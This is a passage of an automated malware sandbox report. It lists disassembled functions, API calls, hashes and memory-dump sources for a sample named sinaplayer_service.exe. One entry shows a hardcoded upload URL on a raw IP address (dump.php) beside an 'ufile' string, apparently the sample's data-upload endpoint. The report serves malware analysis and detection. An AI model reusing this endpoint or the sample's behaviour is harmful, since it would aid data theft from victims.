                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC9194B4604641DFD72ACF09C1A5A20FBE6BB5A318B29C59DD44D8F352C776EC82CB80
                                                                                                                                                                                                    Function 00371500 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,?,?,?,?,003710EA,?,?), ref: 00371573
                                                                                                                                                                                                    • memcpy.MSVCR120(?,?,?,?,?,?,?,003710EA,?,?), ref: 003715C8
                                                                                                                                                                                                      • Part of subcall function 003713E0: ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,?,?,?,0037155F,?,?,?,?,?,?,003710EA,?,?), ref: 003713FA
                                                                                                                                                                                                      • Part of subcall function 003713E0: ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,?,?,?,0037155F,?,?,?,?,?,?,003710EA,?,?), ref: 0037141A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Xout_of_range@std@@$Xlength_error@std@@memcpy
                                                                                                                                                                                                    • String ID: string too long
                                                                                                                                                                                                    • API String ID: 3790025958-2556327735
                                                                                                                                                                                                    • Opcode ID: 69f661561828619d3aec86d14808375f23d99343195a075e55549a2e377872b3
                                                                                                                                                                                                    • Instruction ID: 2d8b97b32cd4164838bc9a0e9dcc7b168b58d3e1c1e64724d466fe55360d4d5d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 69f661561828619d3aec86d14808375f23d99343195a075e55549a2e377872b3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C431D5333106105BD73B9E5CA88096AF7AAEBD6770B20852BF59ACB740C766DC4487E0
                                                                                                                                                                                                    Function 00375100 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,?,?,?,?,00371E69,?,?), ref: 00375167
                                                                                                                                                                                                    • memcpy.MSVCR120(?,?,00000007,?,?,?,?,00371E69,?,?), ref: 003751C3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Xlength_error@std@@memcpy
                                                                                                                                                                                                    • String ID: string too long
                                                                                                                                                                                                    • API String ID: 237780522-2556327735
                                                                                                                                                                                                    • Opcode ID: cfbf4df4201ed030652820045273be80cfabcaf78774d7b3a5653d4b55ca684d
                                                                                                                                                                                                    • Instruction ID: dc9c04c2170a93a3fabe36bc9def8034ce1b79b86907f23b57d9247ceea55cb0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cfbf4df4201ed030652820045273be80cfabcaf78774d7b3a5653d4b55ca684d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC31C932314B149B8E3A9E5CEC8096AF3EAFF947533A0852FE14AC7710D765AC4487A4
                                                                                                                                                                                                    Function 00374F00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,?,?,?,?,003722E9,?,?,00000000,-00000002,00000000,-00000002), ref: 00374F6E
                                                                                                                                                                                                    • memcpy.MSVCR120(?,?,00000000,00000000,00000000,?,?,?,?,003722E9,?,?,00000000,-00000002,00000000,-00000002), ref: 00374FA5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Xlength_error@std@@memcpy
                                                                                                                                                                                                    • String ID: string too long
                                                                                                                                                                                                    • API String ID: 237780522-2556327735
                                                                                                                                                                                                    • Opcode ID: 8a47b92b879a48447ae90352e214d77584621fce325eb458b406be49d97e190c
                                                                                                                                                                                                    • Instruction ID: fb66b8c0c8bdd7f1c01a4dec0f8ff46ae80c6a79a826811157639804c230a50e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a47b92b879a48447ae90352e214d77584621fce325eb458b406be49d97e190c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC31D0323106149B8B36DE5DE88096AF7AAFF81761310852EF59DCB650DB34F819C7A4
                                                                                                                                                                                                    Function 003907C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95timeCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSystemTime.KERNEL32(?,8285FFAB,75919350,?,7591DF10,?,0039BE88,000000FF,?,0037F504,?,?,?,?,http://125.211.213.34/dump.php,0000001E), ref: 00390806
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(0039BE88,?,?,?,ufile,00000005,?,7591DF10), ref: 00390896
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@SystemTime
                                                                                                                                                                                                    • String ID: ufile
                                                                                                                                                                                                    • API String ID: 1521329016-1523282350
                                                                                                                                                                                                    • Opcode ID: 1dbf276620221981f4b4e42968217578196d15bfd6ff8dcbb00a3c3e947f8066
                                                                                                                                                                                                    • Instruction ID: 0920c9960788d0276488f104ec4f3d6ace00c129adc5f9402d56ce1c764b19c7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1dbf276620221981f4b4e42968217578196d15bfd6ff8dcbb00a3c3e947f8066
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E313D72E04208AFCF15DFA8D981BEEB7F9EB08710F10452AF815E7690E7349954CBA4
                                                                                                                                                                                                    Function 6C57EFAF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: "
                                                                                                                                                                                                    • API String ID: 0-123907689
                                                                                                                                                                                                    • Opcode ID: eaffb736c70da9831b547ffc88d9b76e9718cc6a2c1efe1c865bc4693b0c627f
                                                                                                                                                                                                    • Instruction ID: 0a73b55bf7b5db397c9a9e3a4b7512e190709549a69dd7cdca8bd8f5b3ef1449
                                                                                                                                                                                                    • Opcode Fuzzy Hash: eaffb736c70da9831b547ffc88d9b76e9718cc6a2c1efe1c865bc4693b0c627f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 60212B7554122596DB34CF59DC046BC33B0EF48B58F20860AECA49BB81E6708DC2C3B0
                                                                                                                                                                                                    Function 6C57AA9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: NameName::
                                                                                                                                                                                                    • String ID: amp$cpu
                                                                                                                                                                                                    • API String ID: 1333004437-2542064945
                                                                                                                                                                                                    • Opcode ID: 94da6c5288bda530fa5afa66d8d5185e2739387d3ac43cbd3b2d277e67d69829
                                                                                                                                                                                                    • Instruction ID: eabca3f9099a13d22da15720e04b880e4d5ab33a36f379d04a57a8941959e30b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94da6c5288bda530fa5afa66d8d5185e2739387d3ac43cbd3b2d277e67d69829
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8210531A05508FFD714DF9ECDA0AED7BB4EF96314F049188E4185BB50EB31AE468794
                                                                                                                                                                                                    Function 003752C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,00000000,?,?,0037503E,00000000,?,?,?,?,?,00375150,?,?,?), ref: 003752D6
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • invalid string position, xrefs: 003752D1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Xout_of_range@std@@
                                                                                                                                                                                                    • String ID: invalid string position
                                                                                                                                                                                                    • API String ID: 1960685668-1799206989
                                                                                                                                                                                                    • Opcode ID: 49896230356cb0ad5c69ed3fb32464d9c875a158096e40caf9e8d06e37408035
                                                                                                                                                                                                    • Instruction ID: c743d3142d23841eeb0089ee276474514e491aea55e89f72025d811d789e1a61
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49896230356cb0ad5c69ed3fb32464d9c875a158096e40caf9e8d06e37408035
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B11D3363147048B97399F6DE84485AB7EAEFE4752305853FE58AC7620DBB0D818C7A4
                                                                                                                                                                                                    Function 0038D570 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,0039FC64,?,?,00392241,00000008,00000000), ref: 0038D58B
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,0039FC1C,0039FC64,?,?,00392241,00000008,00000000), ref: 0038D5A3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Xlength_error@std@@
                                                                                                                                                                                                    • String ID: string too long
                                                                                                                                                                                                    • API String ID: 1004598685-2556327735
                                                                                                                                                                                                    • Opcode ID: 6c90f6b55c55a94a70095032041f33c3f2c4af4c7404e0ac3fc0f91bd85e9468
                                                                                                                                                                                                    • Instruction ID: fdad38019b318c99953e4b629b7303e20a619de08490b42fef2ae3b48b1c106b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6c90f6b55c55a94a70095032041f33c3f2c4af4c7404e0ac3fc0f91bd85e9468
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E011D6323043145BD7226E5CE840A5AF7A9FB91761F500A6FF195CB291D762DC0483A0
                                                                                                                                                                                                    Function 6C582D31 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,6C631218,00000104,?,?,?,?,?,?,6C582903), ref: 6C582D4F
                                                                                                                                                                                                    • _malloc_crt.MSVCR120 ref: 6C582D9E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileModuleName_malloc_crt
                                                                                                                                                                                                    • String ID: HD
                                                                                                                                                                                                    • API String ID: 2373854079-3471098148
                                                                                                                                                                                                    • Opcode ID: 60e9788d22c54e471ead56d1c29b2b441185509ad63f1b9b21bcfea0dd46c727
                                                                                                                                                                                                    • Instruction ID: a86d0caef80b98d9ceff93b5abc9c17071665cf6902f5b22f614c2fd0dc1cd08
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60e9788d22c54e471ead56d1c29b2b441185509ad63f1b9b21bcfea0dd46c727
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4511B772607128AB8710CFA5CCC4CFB7FFCEB46324B100669E511C3A40E775DE4586A5
                                                                                                                                                                                                    Function 003716C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,00000000,?,?,00371452,00000000,?,?,?,?,?,0037155F,?,?,?), ref: 003716D6
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • invalid string position, xrefs: 003716D1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Xout_of_range@std@@
                                                                                                                                                                                                    • String ID: invalid string position
                                                                                                                                                                                                    • API String ID: 1960685668-1799206989
                                                                                                                                                                                                    • Opcode ID: 34531fb93ac81bf003bffe53e66f51ddf8781d207a14b199d8c4bf522fea7cee
                                                                                                                                                                                                    • Instruction ID: 6d581f3a0e6ff433a65e87b7e35359275e56dece0511047c88836963a2e9d946
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34531fb93ac81bf003bffe53e66f51ddf8781d207a14b199d8c4bf522fea7cee
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D119D373002918BDB359E5CE840A86BBADEBA1712F15893FE58ACB211D7B1D804C7E1
                                                                                                                                                                                                    Function 6C5EEF67 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: NameName::
                                                                                                                                                                                                    • String ID: void
                                                                                                                                                                                                    • API String ID: 1333004437-3531332078
                                                                                                                                                                                                    • Opcode ID: 49fd6331cdcaaf1122114c5fa99f367ba04a51c934e7e0881eba2f58e998584e
                                                                                                                                                                                                    • Instruction ID: 8ea439c7e1883cc6f185e575dfce41e2e2b91adebdd166a58f6eb28258c7446f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49fd6331cdcaaf1122114c5fa99f367ba04a51c934e7e0881eba2f58e998584e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC11C471918208EACB18DF64CC94EEC7B74AB89308F000199E8155BB80DF70AE89C7A1
                                                                                                                                                                                                    Function 00380EE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(0000000C,8285FFAB,00000000,759218A0,?,h9,0039AB0B,000000FF,?,00381C9B,h9), ref: 00380F09
                                                                                                                                                                                                    • _com_util::ConvertStringToBSTR.COMSUPP ref: 00380F32
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@ConvertString_com_util::
                                                                                                                                                                                                    • String ID: h9
                                                                                                                                                                                                    • API String ID: 113643578-554728239
                                                                                                                                                                                                    • Opcode ID: 8685d4a8dcbabeddac80b75cf91be92d48323d4b8fc188633acfba3e0aea9de4
                                                                                                                                                                                                    • Instruction ID: a90083363306a474de35507f10da94e194d8dc0e9940fedbc7b5556f382078df
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8685d4a8dcbabeddac80b75cf91be92d48323d4b8fc188633acfba3e0aea9de4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D801D4B2904754EBD7229F58C801B9AFBE8EB44B30F11872AE9159B780D7B55804C7D0
                                                                                                                                                                                                    Function 6C580E26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6C581D5C: GetModuleFileNameW.KERNEL32(00000000,C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe,00000104,?,?,?,?,?,?,6C580E43), ref: 6C581D7A
                                                                                                                                                                                                      • Part of subcall function 6C581D5C: _malloc_crt.MSVCR120 ref: 6C581DC9
                                                                                                                                                                                                    • ___crtGetEnvironmentStringsW.LIBCMT ref: 6C580E66
                                                                                                                                                                                                      • Part of subcall function 6C5795B9: GetEnvironmentStringsW.KERNEL32(?,?,?,6C579DA3,?,00000000,?,6C5796C4,?,?,?,?,6C5796E8,0000000C), ref: 6C5795BE
                                                                                                                                                                                                      • Part of subcall function 6C5795B9: _malloc_crt.MSVCR120(-00000002,00ED4598,?,?,6C579DA3,?,00000000,?,6C5796C4,?,?,?,?,6C5796E8,0000000C), ref: 6C5795EB
                                                                                                                                                                                                      • Part of subcall function 6C5795B9: memcpy.MSVCR120(00000000,00000000,-00000002,00ED4598,?,?,6C579DA3,?,00000000,?,6C5796C4,?,?,?,?,6C5796E8), ref: 6C5795FB
                                                                                                                                                                                                      • Part of subcall function 6C5795B9: FreeEnvironmentStringsW.KERNEL32(00000000,00ED4598,?,?,6C579DA3,?,00000000,?,6C5796C4,?,?,?,?,6C5796E8,0000000C), ref: 6C579607
                                                                                                                                                                                                      • Part of subcall function 6C579704: wcslen.MSVCR120(00000000,?,00ED4598,?,6C579DAD,?,00000000,?,6C5796C4,?,?,?,?,6C5796E8,0000000C), ref: 6C579727
                                                                                                                                                                                                    • ___mbtow_environ.LIBCMT ref: 6C5A3BAE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EnvironmentStrings$_malloc_crt$FileFreeModuleName___crt___mbtow_environmemcpywcslen
                                                                                                                                                                                                    • String ID: HD
                                                                                                                                                                                                    • API String ID: 2833736322-3471098148
                                                                                                                                                                                                    • Opcode ID: 95c7af6e80a85ac1cfb7b3e225bc1806705d26c10d06824755486714f7a10b1c
                                                                                                                                                                                                    • Instruction ID: b5685f6f41f2a4c6bf6f337e0eb8d508e97998b6d26bc14cffec46ad6849ace0
